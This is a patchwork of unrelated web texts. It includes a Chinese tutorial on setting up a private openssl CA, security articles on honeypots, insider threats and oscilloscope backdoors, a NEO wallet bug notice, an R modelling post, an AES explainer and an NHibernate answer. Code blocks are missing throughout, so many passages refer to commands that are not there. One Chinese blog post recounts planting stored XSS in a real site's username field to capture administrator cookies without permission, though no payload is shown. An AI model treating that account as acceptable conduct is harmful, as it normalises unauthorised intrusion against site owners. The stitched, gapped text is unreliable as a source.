因为SM2实在是太非主流了，而且密码学相关的东西本来就复杂的要死，所以这边就先用RSA进行签名和验签测试。同时因为硬件签名机其证书所用的私钥是通过硬件产生并保存在机器当中(而且通常都导不出来)，然后通过硬件产生证书请求文件来让CA核发证书的，所以这边为了折腾方便就自己建了一个CA，然后可以按照各种姿势核发证书了！

对于几乎所有的linux系统都会默认已经安装好了openssl工具了，而其相关配置文件和工作路径在系统的 /etc/pki/ 目录下面。

openssl默认情况下就可以使用，不过通过修改 /etc/pki/tls/openssl.conf 配置文件的一些配置信息，比如证书的有效期、默认国家地区等参数，以及对新证书请求的规则检查策略配置好，后面在签发新证书会比较方便，很多参数直接使用默认值变可以一路回车了。

default_days = 1095 # how long to certify for, 3 years dir = /etc/pki/CA # Where everything is kept countryName_default = CN stateOrProvinceName_default = Guangdong localityName_default = Shenzhen 0.organizationName_default = cpplus.cc Co.LTD organizationalUnitName_default = R&D

从上面的配置可知， /etc/pki/CA 是整个CA的工作路径，然后我们切换到该目录下，执行如下操作：

上面的index.txt文件会罗列出后面新签发证书的序列号和DN信息，而serial是一个全局递增的索引记录文件，每签发一个证书该文件中的序列号就会执行递增操作。

其实真正执行签名-验签、加密-解密功能，是通过私钥和公钥机制来实现的，而证书则是用来标识这对公私钥的合法身份的。证书的管理是一个强集权组织形式，各个层级的根证书为其所核发的证书负责，而最顶层的根证书都是由信誉良好的公司或者组织管理的，这些根证书被预先内置于操作系统或浏览器中，而私人核发的根证书只能由用户手动导入到系统中去。

下面的命令产生了根证书所需要的私钥，这个一定要保存好了！同时由于证书会跟主机进行绑定，所以这边设置一下主机名，除了hostname命令之外还包括 /etc/sysconfig/network 文件的对应修改。

然后我们跳过证书请求文件，根据上面的私钥文件直接产生根证书，证书的有效期被设置为3年，命令执行成功后会在当前目录生成根证书文件cacert.pem。

使用下面的命令可以以人类阅读更友好的方式查看证书的相关信息和描述。

这个cacert.pem证书是可以发布给任何人或任何机构的，他们只要将这个证书设置成信任的根证书，那么此后基于该根证书核发的所有证书就默认都被信任了。在windows环境下我们可以将cacert.pem重新命名为cpplus.cc.cer，然后就可以通过双击安装该证书了。同时，如果需要在硬件签名机上使用，也可以将其作为信任的根证书导入到签名机上去。

现在CA已经搭建完毕，可以帮应用或客户签发新证书了，这里切换到其他目录操作。

这里虽然和上面构建CA写在一篇文章中，其实这部操作是由证书的申请者在自己本地执行的，其产生的私钥自己保留，不需要提供给CA，客户只需要生成私钥后，再根据私钥创建证书申请文件，拿着证书申请文件就可以让CA签发新证书了。

创建私钥和证书请求文件通过openssl工具都可以“软件”完成，就如下面例子操作的两个步骤一样。

如果要使用到硬件签名，那么就需要通过签名机管理工具的形式让签名机生成私钥，再根据私钥生成证书请求文件。拿着证书请求文件向CA索取新签发的证书后，再将证书对应到原始的私钥导入到签名机就可以使用了。所以使用签名机的好处一方面是专用的硬件执行签名验签速度更快，同时私钥会强制保存在机器中而不会存在于某个电脑磁盘上，所以不容易造成私钥泄漏的问题。

当CA拿到申请者的证书请求文件后，就可以向其核发新证书了。虽然这里只需一步操作，但是在这之前CA要严格核查证书申请者的身份信息，因为CA需要对自己签发的证书负责，滥发证书将会影响自己的信誉，严重时候CA的根证书可能会被主流设备或软件厂商置为不信任状态，则此时CA就再也无法核发被信任的证书了。

从上面的日志可以看出，该签发已经提交，在当前目录下面生成新证书了。然后再查看之前描述的几个记录文件，相关数据也更新了：

然后在Windows下看一下这个新证书――嗯，像个样子啦！

在新证书sz.cpplus.cc.crt产生后就可以交付给客户了。申请者拿到新证书后再结合之前的私钥就可以做很多事，尝试很多的测试了。比如，我们就可以使用CA的根证书校验当前生成的新证书是否有效：

同时openssl工具集本身还提供了简单的https测试服务端，可以模拟该证书用于HTTP SSL是否正常。使用下面的命令可以尝试体验一下这个小功能：

下面的截图是访问过程中打印的相关请求和认证信息：

如果需要签发相关证书测试或者把玩的，可以联系我;-)

通过上面的方式，自己签发签名机请求的证书，导入到硬件签名机中签名和验签的功能都是有效的。

关于签名机，我们选用的两家设备价格相对都比较便宜，也印证了那句老话――便宜没好货。一家的设备是使用MFC写的管理工具，只能在Windows环境下使用不说，其界面丑陋、操作反人类简直连刚上计算机课程大学生做的作业都不如；另外一家用tomcat作了个Web UI倒也还进步了，但链接经常响应出错误页面，而且部分页面还提示语乱码。难道现在只有互联网行业才讲究软件的用户体验么？

如果抛开界面说底层API，两家的C/C++接口居然没有使用一个const关键字！

当然，就正如跟一个厂家服务代表聊的一样：密码机(签名机、加密机等)，也是一个相对封闭、圈子很小的行业，在这种情况下友商们互相看看，感觉大家都做的只要说得过去也就行了，毕竟重要的大客户采购招标还有很多的因素存在。

本文完！

For an organization that has a reasonably complete security posture, including a mature threat intelligence capability, the implementation of a so-called “honeypot” should be considered. A honeypot is like a digital trap that is set for potential attackers. It lures the attackers inside by mimicking it to be a target they were looking for, sometimes with deliberate built in vulnerabilities, apparently waiting to be exploited.

Once the attackers use the honeypot system, thinking they have reached the intended target, all actions are recorded and all modified and newly-dropped files are captured. In this way, a great deal can be learned about potential adversaries, their Tools, Techniques and Procedures (TTP’s) and how they would circumvent the organizations actual production security controls. It allows for truly proactive security intelligence gathering, although there are some caveats.

A honeypot is a great weapon in the arsenal of defensive security teams. Its use does, however, come with some challenges.

The obvious one is the risk that an attacker successfully exploits a honeypot and then manages to move laterally into the actual production network. It is critical to isolate a honeypot from any other network! This seems like a simple task, but it only takes a single forgotten system or a single firewall rule change to create a very dangerous situation. Networks are inherently complex.

Another challenge is the amount of time and with that, are the costs that come with the management of a honeypot. The system will need to be configured and maintained, of course. But that is not all: The captured activity needs to be used within the organization’s security teams for it to be of any value. This will take a lot of time to structure and to fit within operational processes. The information will (Read more...)

A recent report commissioned by CA Technologies threw up some very interesting and alarming data about the threats that an insider can pose to an organization. The report found that:

One of the biggest problems with an insider threat is that it is just that ― an insider. An insider can be a work colleague, a freelancer, someone from head office or a worker from a partner company. An insider, is, by definition, anyone who has an intrinsic or close connection to an organization.

Insiders can be of both accidental and malicious types. And, not all malicious insiders know they have become an insider threat ― they are, instead, “proxy insider threats,” being used by malicious outsiders to get inside the business.

It is a complicated business to spot an insider and to then deal with them. This article will look at some ways to check if Jan from Accounts is after your data.

The best way to know if an insider will become a threat is to know where the threats lie. Understanding the drivers behind a data breach or IT sabotage offers you an insight into the types of indicators and behavior that foretells trouble ahead.

The Problem:McAfee report that 43% of data breaches start with an insider. Sometimes the issue begins just as the insider leaves. The case of Jason Needham demonstrates this well.

Mr. Needham worked for the Allen and Hoshall engineering firm but left in (Read more...)

Administrators overseeing lab environments would be well advised to double-check their network setups following the disclosure of serious flaws in a line of oscilloscopes.

On Friday, SEC Consult said it had uncovered a set of high-impact vulnerabilities in electronic testing equipment made by Siglent Technologies.

In particular, the bug-hunters examined the Siglent SDS 1202X-E Digital line of Ethernet-enabled oscilloscopes and found the boxes were lacking even basic security protections.

Among the flaws found by researchers was the use of completely unauthenticated and unguarded TCP connections between the oscilloscopes and any device on the network, typically via the EasyScopeX software, and the use of unencrypted communications between the scope and other systems on the network.

"Two backdoor accounts are present on the system," the researchers explained. "A Telnet service is listening on port 23 which enables an attacker to connect as root to the oscilloscope via LAN."

As a result, anyone who had local network access would be able to get onto the device and tamper with it.

Siglent did not respond to a request for comment on the matter.

Chalk this up as yet another example of the dangers brought on by the growing market for connected internet-of-things devices.

Normally, an oscilloscope would be the last thing an admin would have to worry about, however as new connectivity is bolted onto devices that traditionally operated in isolation, it is inevitable that some otherwise basic security measures will be overlooked.

Aside from the obvious dangers of allowing an attacker to use the compromised devices as a starting to point for attacks on other network devices, SEC Consult noted that someone could also use the vulnerabilities to mess with the oscilloscope's own readings - offering a handy route for sabotage.

"Any malicious modification of measurement values may have serious impact on the product or service which is created or offered by using this oscilloscope," SEC Consult said of the flaw. "Therefore, all procedures which are executed with this device are untrustworthy."

That point is particularly noteworthy as observers have noted a marked increase in industrial espionage and IP theft attacks in recent years. It is not beyond the realm of possibility that a company wanting to hamper the progress of a rival, or a state-sponsored group that wanted to disrupt R&D, would look to mess with engineering equipment of a targeted facility.

Sponsored: Five steps to dealing with the insider threat

最近在逛小程序，其中发现一个小程序是申请用户信息后自动在某站注册账号。

于是便去网站看了下，WOW！好多输入框~就顺手试了下xss。

本着学习交流的目的，用颤巍巍的手指在用户名称的输入框里输下了如下代码：

emm...没反应，内心一阵失落，并没有预期中那样弹出个框来，叹了口气。

但是，好歹是个程序猿，不能轻言放弃。

便找了一些xss变异代码进行测试：

WOW！棒呆呆！

当时我在想，他的小程序是有充值功能的。

管理员或者财务肯定会没事儿看一下今天有没有消费呀~有哪些新用户充值了呀~

那不如~

刷两笔充值的单子，然后在用户名称植入中植入xss，姜太公钓鱼愿者上钩。

便从搜索引擎找了几家带https的xss平台，勾选个能获取cookie的模块：

头一次利用xss干一些事情，很舒服。

可惜的是后台和用户中心是共用的，并没有找到上传文件等再利用的地方。

只能充个小钱啥的~

已反馈给相关管理员进行修复。

做开发的，安全防范意识一定要有啊！

使用支付宝、微信、QQ客户端扫码打赏

打 赏 作 者

本文由SangSir 创作，采用 知识共享署名4.0 国际许可协议进行许可

本站文章除注明转载/出处外，均为本站原创或翻译，转载前请务必署名

China’sTencent Security Lab has warned the NEO community about a bug which allows hackers to steal tokens from the user wallets remotely.

China’s Tech giant Tencent has informed the NEO developers and node operators about a bug which could potentially allow hackers to steal tokens remotely. According to Tencent’s security lab when a user starts a network node with the default configuration they are at risk of losing theirfunds.

Tencent’s Security arm published on the Chinese social media platformWeibo alerting users about the critical bug. The firm warns all the node maintainers and ant coin (GAS) holders to pay attention to wallet security and update the client version in time.

The security arm has published three steps to avoid such attacks:

Advertisement

NEO is currently priced at $8.15 with a market cap of $529 Million. Recently Binance, one of the world’s largest exchange rated NEO with a gold label along with other projects like Tron, Verge, and Nano.

Get the latest news on Blockchain only on Blockmanity.com . Subscribe to us on Google news and do follow us on Twitter @Blockmanity

Did you like the news you just read? Please leave a feedback to help us serve you better

Post Views: 172

(This article was first published on R Programming DataScience+ , and kindly contributed toR-bloggers)

Categories

Tags

We are continuing on with our NYC bus breakdown problem . When we left off, we had constructed a rule-based Cubist regression model with our expanded pool of predictors ; but we were still only managing to explain 37% of the data's variance with our model. Given how 'dirty' the target variable 'time_delayed' is (because it is human reported and of dubious precision), we decided that perhaps we should rephrase the question in order to get a more sensible answer. When a bus breakdown is called into operations, perhaps the question to ask is: “Will this delay exceed twenty minutes?”

We could choose some other time, but for simplicity, twenty minutes is probably the breaking point of human patience be they, passengers or providers. This division also breaks the dataset approximately in half, so we don't have to deal with imbalance. As a side note, I have also run the problem for a thirty minute or more delay, breaking the data into and ; and the solution only improves.

We begin by setting up the data that we need, and the caret control objects:

Then we can use cross-fold validation on a reduced data set to quickly get a sense of which parameters we should use. Note that we deliberately choose 'rules', not 'tree' here, because we want a human-readable set of if/then conditions. Unfortunately, we will end up using 15 trials, which means our rule set is large. I have commented its output here, but it can be read this way, or with 'summary(model)'.

The system is relatively insensitive to the number of trials, so we can use 15. We run on our training and test sets to derive our true test ROC, and have a look at how our predicted probabilities correlate with the predictors, compared to the actual values.

最近恶补了一些关于加密算法的知识，然后用编程语言的来实现

高级加密标准(AES,Advanced Encryption Standard)为最常见的 对称加密算法 (微信小程序加密传输就是用这个加密算法的)。 对称加密算法也就是加密和解密用相同的密钥 ，具体的加密流程如下图：

下面简单介绍下各个部分的作用与意义：

没有经过加密的数据

用来加密明文的密码， 在对称加密算法中，加密与解密的密钥是相同的 ，密钥为接收方与发送方协商产生，但不可以直接在网络上传输，否则会导致密钥泄露，通常是通过非对称加密算法加密密钥，然后再通过网络传输给对方，或者直接面对面商量密钥。密钥绝对不能泄露，否则会被攻击者还原密钥，窃取数据

设AES加密函数为E，则 C = E(K,P) .其中P为明文，K为密钥，C为密文。也就是说，把明文P和密钥K作为加密函数的参数输入，则加密函数E会输出密文C

经过加密函数处理后的数据

设AES解密函数为D，则 P = D() .其中C为密文，K为密钥，P为明文。也就是说，把密文C和密钥K作为解密函数的参数输入，则解密函数会输出明文P

这里简单解释下 对称加密算法 和 非对称加密算法

加密和解密使用的密钥是相同的，这种加密方式加密 速度非常快 ，适合经常发送数据的场合。 缺点是密钥的传输比较麻烦

加密和解密使用的密钥是不同的，这种加密方式是用数学定理或者公式构造的，通常加密解密的 速度比较慢 ，适合偶尔发送数据的场合。 优点是密钥传输方便 。常见的非对称加密算法为RSA、ECC和EIGamal

实际中，一般是通过RSA加密AES的密钥，传输到接收方，接收方解密得到AES密钥

AES为分组密码，分组密码也就是把明文分成一组一组的，每组长度相等，每次加密一组数据，直到加密完所有组。在AES标准规范中，分组长度只能是128位，也就是说，每个分组为16个字节。密钥的长度可以使用128位、192位或256位。密钥的长度不同，推荐加密轮数也不同。如下表所示：

上面说到，AES的加密公式为 C = E(K,P) ，在加密函数E种，会执行一个轮函数，并且执行n(n为加密轮数)次这个轮函数，这个轮函数的前n-1次执行的操作是一样的，只有第n次有所不同

AES的处理单位是字节，128位的输入明文分组P和输入密钥K都被分成16字节，分别记为$P = P_0,P_1,...,P_{15}$和$K = K_0,K_1,...,K_{15}$。如明文分组为P=abcdefghijklmnop，其中字符a对应$P_0$，p对应$P_{15}$。一般地，明文分组用字节为单位地正方形矩阵描述，称为状态矩阵。在算法地每一轮中，状态矩阵地内容不断发生变化，最后的结果作为密文输出。该矩阵中字节地排列顺序为从上到下、从左至右依次排列，如下图所示：

现在假设明文分组P=abcdefghijklmnop，则对应上面生成地状态矩阵图如下：

上图中，0x61为a字符的十六进制表示，可以看到，明文经过AES加密后，已经面目全非了

上图也展示了AES的解密过程，解密过程仍为10轮，每一轮的操作是加密操作的逆操作。由于AES的4个轮操作都是可逆的，因此，解密操作的每一轮就是顺序执行逆行移位、逆字节代换、轮密钥加和逆列混合。同加密操作类似，最后一轮不执行逆列混合，在第1轮解密之前，要执行1次密钥加操作

下面分别介绍AES中一轮的4个操作阶段，这4分操作阶段使输入位得到充分的混淆

AES的字节代换其实就是一个简单的查表操作。AES定义了一个S盒和一个逆S盒

AES的S盒：

把该字节的高4位作为行值，低4位作为列值，取出S盒或者逆S盒中对应的行的元素作为输出。例如，加密时，输出的字节S1为0x12,则查S盒的第0x01行和0x02列，得到值0xc9,然后替换S1原有的0x12为0xc9。状态矩阵经字节代换后的图如下：

逆字节代换也就是查逆S盒来变换，逆S盒如下：

行移位是一个简单的左循环移位操作。当密钥长度为128比特时，状态矩阵的第0行左移0字节，第1行左移1字节，第2行左移2字节，第3行左移3字节，如下图所示：

行移位的逆变换是将状态矩阵中的每一行执行相反的移位操作，例如AES-128中，状态矩阵的第0行右移0字节，第1行右移1字节，第2行右移2字节，第3行右移3字节

列混合变换是通过矩阵相乘来实现的，经行移位后的状态矩阵与固定的矩阵相乘，得到混淆后的状态矩阵，如下图的公式所示：

状态矩阵中的第j列(0 ≤j≤3)的列混合可以表示为：

$$

S'_{0,j} = (2 S_{0,j}) \oplus (3 S_{1,j}) \oplus S_{2,j} \oplus S_{3,j}

S'_{1,j} = S_{0,j} \oplus (2 S_{1,j}) \oplus (3 S_{2,j}) \oplus S_{3,j}

S'_{2,j} = S_{0,j} \oplus S_{1,j} \oplus (2 S_{2,j}) \oplus (3 S_{3,j})

S'_{3,j} = (3 S_{0,j}) \oplus S_{1,j} \oplus S_{2,j} \oplus (2 S_{3,j})

$$

逆向列混合变换可由下图的矩阵乘法定义：

可以验证，逆变换矩阵同正变换矩阵的乘积恰好为单位矩阵

轮密钥加的逆运算同正向的轮密钥加运算完全一致，这是因为异或的逆操作是其自身。轮密钥加非常简单，但却能够影响S数组中的每一位

接着，对W数组扩充40个新列，构成总共44列的扩展密钥数组。新列以如下的递归方式产生：

其中，函数T由3部分组成：字循环、字节代换和轮常量异或，这3部分的作用分别如下：

举个例子，设初始的128为密钥为： 3C A1 0B 21 57 F0 19 16 90 2E 13 80 AC C1 07 BD ，那么4个初始值为

其余3个子密钥段的计算如下：

所以，第一轮的密钥为 45 64 71 B0 12 94 68 A6 82 BA 7B 26 2E 7B 7C 9B

由于Java有自带的函数，因此可以直接调用

首先生成密钥，密钥是 SecretKey 类型的对象

The following Linq to NHibernate query results in a System.NotSupportedException .

How should I do this using Linq to NHibernate or QueryOver<File>() ?

Due to the fact that the error is already indicating that NHibernate does not support that feature. I would create a named query and solve the equation within a query. I have tested it with mysql (using a common username and password comparison as example) and the following statement returns the desired row (password is a BINARY(32) field):

Using mssql you can do:

So to extend this to a named query you would create an .hbm.xml file like 'User.hbm.xml' with the following content:

To configure this I used Fluent NHibernate but something similar would be possible with just plain NHibernate:

This statement looks for the ".hbm.xml" files in the assembly with the interface named "IHaveFluentNHibernateMappings"

With this in place you can do the following at session level:

And by calling the the GetUserByCredentials method, the custom query will be executed.

As you can see password is a string, so you need to convert your MD5 byte array to a string first by using:

Good luck!